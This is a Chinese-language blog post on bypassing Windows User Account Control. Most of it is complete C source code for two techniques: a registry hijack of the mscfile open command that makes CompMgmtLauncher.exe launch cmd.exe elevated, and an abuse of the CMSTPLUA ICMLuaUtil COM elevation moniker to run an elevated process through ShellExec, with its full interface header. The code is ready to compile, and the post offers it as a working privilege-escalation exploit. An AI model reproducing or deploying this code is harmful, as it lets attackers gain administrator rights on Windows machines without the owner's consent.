ByPass UAC

ByPass UAC

  • 白名单程序 Bypass UAC

有些系统程序是直接获取管理员权限,而不触发UAC弹框的,这类程序称为白名单程序.例如, slui.exe、wusa.exe、taskmgr.exe、msra.exe、eudcedit.exe、eventvwr.exe、CompMgmtLauncher.exe等.这些 白名单程序可以通过DLL劫持、注入或是修改注册表执行命令的方式启动目标程序,实现Bypass UAC提权操作

利用CompMgmtLauncher.exe、该程序在启动时会查询注册表项"Software\classes\mscfile\shell\open\command"(msc后缀文件默认打开方式)、如果存在就会以管理员权限去执行该项默认程序。

ByPass UAC_第1张图片

#include	
#include	

BOOL	SetReg(char *);

int main()
{
	char *path = "c:\\windows\\system32\\cmd.exe";
	SetReg(path);
}
BOOL	SetReg(char *lpszExePath)
{
	HKEY hKey =	NULL;
	RegCreateKeyEx(HKEY_CURRENT_USER,"Software\\classes\\mscfile\\shell\\open\\command",0,NULL,0, KEY_WOW64_64KEY | KEY_ALL_ACCESS, NULL, &hKey, NULL);
	if (NULL == hKey)
    {
        return FALSE;
    }
    RegSetValueEx(hKey, NULL, 0, REG_SZ, (BYTE *)lpszExePath, (1 + lstrlen(lpszExePath)));
    
    RegCloseKey(hKey);
    return TRUE;
}

ByPass UAC_第2张图片

  • COM组件接口 Bypass UAC

COM提升名称(COM Elevation Moniker)技术允许运行在用户账户控制下的应用程序用提升权限的方法来激活COM类,以提升COM接口权限.所以,基于ICMLuaUtil接口的Bypass UAC的实现原理是利用COM提升名称对 ICMLuaUtil接口提权,提权后通过调用ShellExec方法来创建指定进程,实现Bypass UAC操作.

//bypassUac.cpp
#include	
#include	
#include	"bypassUac.h"

BOOL CMLuaUtilBypassUAC(LPWSTR );
HRESULT CoCreateInstanceAsAdmin(HWND , REFCLSID , REFIID , PVOID *);


int main()
{
	LPWSTR path =L"c:\\windows\\system32\\cmd.exe";
	CMLuaUtilBypassUAC(path);
}

BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable)
{
    HRESULT hr = 0;
    CLSID clsidICMLuaUtil = { 0 };
    IID iidICMLuaUtil = { 0 };
    ICMLuaUtil *CMLuaUtil = NULL;
    BOOL bRet = FALSE;
    do {
        CLSIDFromString(CLSID_CMSTPLUA, &clsidICMLuaUtil);
        IIDFromString(IID_ICMLuaUtil, &iidICMLuaUtil);

        hr = CoCreateInstanceAsAdmin(NULL, clsidICMLuaUtil, iidICMLuaUtil, (PVOID*)(&CMLuaUtil));//提升CMLuaUtil
        if (FAILED(hr))
        {
            break;
        }

        hr = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, lpwszExecutable, NULL, NULL, 0, SW_SHOW);//CMLuaUtil提供的shellExec方法
        if (FAILED(hr))
        {
            break;
        }
        bRet = TRUE;
    }while(FALSE);
    if (CMLuaUtil) 
    {
        CMLuaUtil->lpVtbl->Release(CMLuaUtil);
    }
    return bRet;
}
HRESULT CoCreateInstanceAsAdmin(HWND hWnd, REFCLSID rclsid, REFIID riid, PVOID *ppVoid)
{
    BIND_OPTS3 bo;
    WCHAR wszCLSID[MAX_PATH] = { 0 };
    WCHAR wszMonikerName[MAX_PATH] = { 0 };
    HRESULT hr = 0;

    CoInitialize(NULL);


    StringFromGUID2(rclsid, wszCLSID, STRSAFE_MAX_CCH);
    hr = StringCchPrintfW(wszMonikerName,STRSAFE_MAX_CCH, L"Elevation:Administrator!new:%s", wszCLSID);
    if (FAILED(hr))
    {
        return hr;
    }

    RtlZeroMemory(&bo, sizeof(bo));
    bo.cbStruct = sizeof(bo);
    bo.hwnd = hWnd;
    bo.dwClassContext = CLSCTX_LOCAL_SERVER;
    hr = CoGetObject(wszMonikerName, &bo, riid, ppVoid);
    return hr;
}


//bypassUac.h
#ifndef _BYPASS_UAC_H_
#define _BYPASS_UAC_H_


#include 
#include 
#include 

/*自动提升 CMSTPLUA COM 接口*/
#define CLSID_CMSTPLUA                     L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define IID_ICMLuaUtil                     L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"
/*cmlua shellexec方法*/

typedef interface ICMLuaUtil ICMLuaUtil;

typedef struct ICMLuaUtilVtbl {

	BEGIN_INTERFACE

		HRESULT(STDMETHODCALLTYPE *QueryInterface)(
		__RPC__in ICMLuaUtil * This,
		__RPC__in REFIID riid,
		  void **ppvObject);

		ULONG(STDMETHODCALLTYPE *AddRef)(
			__RPC__in ICMLuaUtil * This);

		ULONG(STDMETHODCALLTYPE *Release)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method1)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method2)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method3)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method4)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method5)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method6)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *ShellExec)(
			__RPC__in ICMLuaUtil * This,
			_In_     LPCWSTR lpFile,
			_In_opt_  LPCTSTR lpParameters,
			_In_opt_  LPCTSTR lpDirectory,
			_In_      ULONG fMask,
			_In_      ULONG nShow
			);

		HRESULT(STDMETHODCALLTYPE *SetRegistryStringValue)(
			__RPC__in ICMLuaUtil * This,
			_In_      HKEY hKey,
			_In_opt_  LPCTSTR lpSubKey,
			_In_opt_  LPCTSTR lpValueName,
			_In_      LPCTSTR lpValueString
			);

		HRESULT(STDMETHODCALLTYPE *Method9)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method10)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method11)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method12)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method13)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method14)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method15)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method16)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method17)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method18)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method19)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method20)(
			__RPC__in ICMLuaUtil * This);

	END_INTERFACE

} *PICMLuaUtilVtbl;

interface ICMLuaUtil
{
	CONST_VTBL struct ICMLuaUtilVtbl *lpVtbl;
};


HRESULT CoCreateInstanceAsAdmin(HWND hWnd, REFCLSID rclsid, REFIID riid, PVOID *ppVoid);

BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable);


#endif

ByPass UAC_第3张图片

你可能感兴趣的:(C/C++编程,uac,bypassUAC)